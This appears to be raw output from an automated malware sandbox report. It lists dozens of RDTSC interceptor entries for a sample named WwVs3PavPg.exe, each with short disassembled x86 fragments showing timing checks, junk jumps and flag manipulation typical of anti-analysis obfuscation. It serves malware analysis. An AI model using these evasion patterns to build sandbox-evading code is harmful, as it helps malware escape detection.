Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D502C7 second address: 4D50309 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F73F90B68F9h 0x00000011 xchg eax, edi 0x00000012 jmp 00007F73F90B68EEh 0x00000017 push dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50309 second address: 4D5030D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D5030D second address: 4D50313 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50313 second address: 4D5033F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F73F910AA5Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D5033F second address: 4D50345 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D503D3 second address: 4D50429 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b pushad 0x0000000c call 00007F73F910AA5Ch 0x00000011 jmp 00007F73F910AA62h 0x00000016 pop esi 0x00000017 mov si, dx 0x0000001a popad 0x0000001b test esi, esi 0x0000001d jmp 00007F73F910AA5Dh 0x00000022 je 00007F746A5F9CE1h 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50429 second address: 4D5042D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D5042D second address: 4D50440 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50440 second address: 4D50458 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73F90B68F4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50458 second address: 4D5047E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000000h 0x0000000d pushad 0x0000000e call 00007F73F910AA5Ah 0x00000013 mov edx, esi 0x00000015 pop esi 0x00000016 mov eax, ebx 0x00000018 popad 0x00000019 mov dword ptr [esi], edi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D5047E second address: 4D50490 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50490 second address: 4D50496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50496 second address: 4D504E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+04h], eax 0x0000000e jmp 00007F73F90B68EEh 0x00000013 mov dword ptr [esi+08h], eax 0x00000016 jmp 00007F73F90B68F0h 0x0000001b mov dword ptr [esi+0Ch], eax 0x0000001e pushad 0x0000001f mov esi, 759A061Dh 0x00000024 mov ebx, ecx 0x00000026 popad 0x00000027 mov eax, dword ptr [ebx+4Ch] 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D504E1 second address: 4D504E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D504E5 second address: 4D5053D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F73F90B68EAh 0x0000000c and si, B8A8h 0x00000011 jmp 00007F73F90B68EBh 0x00000016 popfd 0x00000017 popad 0x00000018 mov dword ptr [esi+10h], eax 0x0000001b jmp 00007F73F90B68F6h 0x00000020 mov eax, dword ptr [ebx+50h] 0x00000023 pushad 0x00000024 mov esi, 195197DDh 0x00000029 mov esi, 0454D4D9h 0x0000002e popad 0x0000002f mov dword ptr [esi+14h], eax 0x00000032 pushad 0x00000033 mov si, 4611h 0x00000037 push eax 0x00000038 push edx 0x00000039 movzx eax, di 0x0000003c rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50654 second address: 4D506C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+28h], eax 0x0000000c pushad 0x0000000d mov edi, ecx 0x0000000f pushfd 0x00000010 jmp 00007F73F910AA5Ah 0x00000015 or ecx, 6FF07398h 0x0000001b jmp 00007F73F910AA5Bh 0x00000020 popfd 0x00000021 popad 0x00000022 mov eax, dword ptr [ebx+68h] 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F73F910AA5Bh 0x0000002e or cx, D45Eh 0x00000033 jmp 00007F73F910AA69h 0x00000038 popfd 0x00000039 pushad 0x0000003a popad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D506C0 second address: 4D506CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73F90B68EAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D506CE second address: 4D506D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D506D2 second address: 4D507B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+2Ch], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F73F90B68EDh 0x00000012 sbb ah, 00000046h 0x00000015 jmp 00007F73F90B68F1h 0x0000001a popfd 0x0000001b mov di, si 0x0000001e popad 0x0000001f mov ax, word ptr [ebx+6Ch] 0x00000023 pushad 0x00000024 jmp 00007F73F90B68F8h 0x00000029 pushfd 0x0000002a jmp 00007F73F90B68F2h 0x0000002f xor si, 1C48h 0x00000034 jmp 00007F73F90B68EBh 0x00000039 popfd 0x0000003a popad 0x0000003b mov word ptr [esi+30h], ax 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007F73F90B68F4h 0x00000046 and cx, 5EA8h 0x0000004b jmp 00007F73F90B68EBh 0x00000050 popfd 0x00000051 push eax 0x00000052 pushfd 0x00000053 jmp 00007F73F90B68EFh 0x00000058 add cx, 83EEh 0x0000005d jmp 00007F73F90B68F9h 0x00000062 popfd 0x00000063 pop ecx 0x00000064 popad 0x00000065 mov ax, word ptr [ebx+00000088h] 0x0000006c pushad 0x0000006d mov ecx, edi 0x0000006f push eax 0x00000070 push edx 0x00000071 pushad 0x00000072 popad 0x00000073 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D507B2 second address: 4D507CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov word ptr [esi+32h], ax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F73F910AA5Ah 0x00000013 mov ah, 4Eh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D507CD second address: 4D507D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D507D3 second address: 4D507D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D507D7 second address: 4D507FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+0000008Ch] 0x00000011 pushad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D507FD second address: 4D508C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushfd 0x00000006 jmp 00007F73F910AA68h 0x0000000b adc ax, 0B58h 0x00000010 jmp 00007F73F910AA5Bh 0x00000015 popfd 0x00000016 popad 0x00000017 mov dword ptr [esi+34h], eax 0x0000001a jmp 00007F73F910AA66h 0x0000001f mov eax, dword ptr [ebx+18h] 0x00000022 pushad 0x00000023 mov esi, 100283CDh 0x00000028 pushfd 0x00000029 jmp 00007F73F910AA5Ah 0x0000002e add si, 5CE8h 0x00000033 jmp 00007F73F910AA5Bh 0x00000038 popfd 0x00000039 popad 0x0000003a mov dword ptr [esi+38h], eax 0x0000003d jmp 00007F73F910AA66h 0x00000042 mov eax, dword ptr [ebx+1Ch] 0x00000045 jmp 00007F73F910AA60h 0x0000004a mov dword ptr [esi+3Ch], eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 pushfd 0x00000051 jmp 00007F73F910AA5Dh 0x00000056 sbb ah, 00000066h 0x00000059 jmp 00007F73F910AA61h 0x0000005e popfd 0x0000005f mov ebx, esi 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D508C4 second address: 4D50905 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 595A2EEEh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+20h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov ebx, eax 0x00000015 pushfd 0x00000016 jmp 00007F73F90B68F8h 0x0000001b and ecx, 0E8FC668h 0x00000021 jmp 00007F73F90B68EBh 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50905 second address: 4D5091D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73F910AA64h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D5091D second address: 4D50921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50921 second address: 4D509A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+40h], eax 0x0000000b jmp 00007F73F910AA67h 0x00000010 lea eax, dword ptr [ebx+00000080h] 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F73F910AA64h 0x0000001d xor ah, 00000058h 0x00000020 jmp 00007F73F910AA5Bh 0x00000025 popfd 0x00000026 mov ecx, 738F170Fh 0x0000002b popad 0x0000002c push 00000001h 0x0000002e jmp 00007F73F910AA62h 0x00000033 nop 0x00000034 jmp 00007F73F910AA60h 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d mov dl, ch 0x0000003f mov bh, 70h 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D509A2 second address: 4D509FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F73F90B68F1h 0x00000009 sub cx, 1606h 0x0000000e jmp 00007F73F90B68F1h 0x00000013 popfd 0x00000014 mov edi, eax 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 nop 0x0000001a jmp 00007F73F90B68EAh 0x0000001f lea eax, dword ptr [ebp-10h] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F73F90B68F7h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D509FA second address: 4D50A4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b movzx ecx, dx 0x0000000e pushad 0x0000000f mov edi, 3D6E2A5Ah 0x00000014 mov di, 9226h 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e call 00007F73F910AA69h 0x00000023 pop eax 0x00000024 mov si, dx 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50A4A second address: 4D50A50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50A50 second address: 4D50A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50A54 second address: 4D50A63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50A63 second address: 4D50A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50A67 second address: 4D50A6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50A6B second address: 4D50A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50A71 second address: 4D50A77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50A77 second address: 4D50A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50AE6 second address: 4D50AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50AEA second address: 4D50AEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50AEE second address: 4D50AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50AF4 second address: 4D50B11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73F910AA69h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50B11 second address: 4D50B15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50B15 second address: 4D50BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F73F910AA63h 0x00000011 adc al, 0000003Eh 0x00000014 jmp 00007F73F910AA69h 0x00000019 popfd 0x0000001a jmp 00007F73F910AA60h 0x0000001f popad 0x00000020 js 00007F746A5F95B7h 0x00000026 jmp 00007F73F910AA60h 0x0000002b mov eax, dword ptr [ebp-0Ch] 0x0000002e jmp 00007F73F910AA60h 0x00000033 mov dword ptr [esi+04h], eax 0x00000036 pushad 0x00000037 mov ebx, eax 0x00000039 mov edi, esi 0x0000003b popad 0x0000003c lea eax, dword ptr [ebx+78h] 0x0000003f jmp 00007F73F910AA64h 0x00000044 push 00000001h 0x00000046 jmp 00007F73F910AA60h 0x0000004b nop 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50BC4 second address: 4D50BE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50BE1 second address: 4D50C05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F73F910AA5Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50C05 second address: 4D50C42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov dl, 03h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b pushad 0x0000000c mov ax, C4FBh 0x00000010 mov ecx, 6CD9B5D7h 0x00000015 popad 0x00000016 lea eax, dword ptr [ebp-08h] 0x00000019 jmp 00007F73F90B68EAh 0x0000001e nop 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F73F90B68F7h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50C42 second address: 4D50C78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F73F910AA61h 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50C78 second address: 4D50C7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50C7C second address: 4D50C82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50C82 second address: 4D50C88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50CB5 second address: 4D50D63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 test edi, edi 0x00000008 jmp 00007F73F910AA66h 0x0000000d js 00007F746A5F943Ch 0x00000013 jmp 00007F73F910AA60h 0x00000018 mov eax, dword ptr [ebp-04h] 0x0000001b jmp 00007F73F910AA60h 0x00000020 mov dword ptr [esi+08h], eax 0x00000023 jmp 00007F73F910AA60h 0x00000028 lea eax, dword ptr [ebx+70h] 0x0000002b jmp 00007F73F910AA60h 0x00000030 push 00000001h 0x00000032 pushad 0x00000033 jmp 00007F73F910AA5Eh 0x00000038 movzx eax, di 0x0000003b popad 0x0000003c push esp 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 pushfd 0x00000041 jmp 00007F73F910AA66h 0x00000046 sub si, 8678h 0x0000004b jmp 00007F73F910AA5Bh 0x00000050 popfd 0x00000051 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50D63 second address: 4D50D74 instructions: 0x00000000 rdtsc 0x00000002 mov bx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50D74 second address: 4D50D78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50D78 second address: 4D50D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50D7E second address: 4D50DDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F73F910AA5Bh 0x00000009 sbb ecx, 3BC8DAEEh 0x0000000f jmp 00007F73F910AA69h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F73F910AA60h 0x0000001b and si, 1268h 0x00000020 jmp 00007F73F910AA5Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 lea eax, dword ptr [ebp-18h] 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50DDB second address: 4D50DE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50DE1 second address: 4D50DFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov edx, esi 0x0000000d mov edi, esi 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50DFD second address: 4D50E01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50E01 second address: 4D50E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50E5D second address: 4D50E63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50E63 second address: 4D50E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50E67 second address: 4D50EDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a jmp 00007F73F90B68F7h 0x0000000f js 00007F746A5A510Dh 0x00000015 jmp 00007F73F90B68F6h 0x0000001a mov eax, dword ptr [ebp-14h] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov ax, bx 0x00000023 pushfd 0x00000024 jmp 00007F73F90B68F9h 0x00000029 or si, 64C6h 0x0000002e jmp 00007F73F90B68F1h 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50EDF second address: 4D50F24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b jmp 00007F73F910AA5Eh 0x00000010 mov dword ptr [esi+0Ch], eax 0x00000013 jmp 00007F73F910AA60h 0x00000018 mov edx, 762C06ECh 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push edx 0x00000021 pop esi 0x00000022 push edi 0x00000023 pop ecx 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50F24 second address: 4D50F2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50F2A second address: 4D50F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50F2E second address: 4D50FB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub eax, eax 0x0000000a pushad 0x0000000b mov dx, 2D1Ah 0x0000000f mov eax, ebx 0x00000011 popad 0x00000012 lock cmpxchg dword ptr [edx], ecx 0x00000016 jmp 00007F73F90B68EDh 0x0000001b pop edi 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F73F90B68F3h 0x00000023 adc ax, FC1Eh 0x00000028 jmp 00007F73F90B68F9h 0x0000002d popfd 0x0000002e popad 0x0000002f test eax, eax 0x00000031 jmp 00007F73F90B68EEh 0x00000036 jne 00007F746A5A502Bh 0x0000003c pushad 0x0000003d jmp 00007F73F90B68EEh 0x00000042 push ecx 0x00000043 pop esi 0x00000044 popad 0x00000045 mov edx, dword ptr [ebp+08h] 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 